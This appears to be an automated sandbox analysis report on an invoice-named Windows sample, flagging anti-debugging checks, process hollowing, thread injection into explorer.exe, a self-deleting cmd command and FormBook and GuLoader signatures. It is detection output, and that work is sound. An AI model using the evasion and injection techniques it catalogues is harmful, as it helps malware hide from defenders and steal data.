Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C20 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h] 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h] 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h] 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E947C38 mov eax, dword ptr fs:[00000030h] 8_2_1E947C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E975C38 mov eax, dword ptr fs:[00000030h] 8_2_1E975C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E975C38 mov ecx, dword ptr fs:[00000030h] 8_2_1E975C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E4C3D mov eax, dword ptr fs:[00000030h] 8_2_1E8E4C3D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A8C3D mov eax, dword ptr fs:[00000030h] 8_2_1E8A8C3D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984C59 mov eax, dword ptr fs:[00000030h] 8_2_1E984C59
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E933C57 mov eax, dword ptr fs:[00000030h] 8_2_1E933C57
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADC40 mov eax, dword ptr fs:[00000030h] 8_2_1E8ADC40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C40 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C40
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_1E8F2EB0

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: zbcdidj04hd0ibmx.exe.10.dr
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 510000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread register set: target process: 4580
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 4580
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: draft_inv dec21.exe PID: 2748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY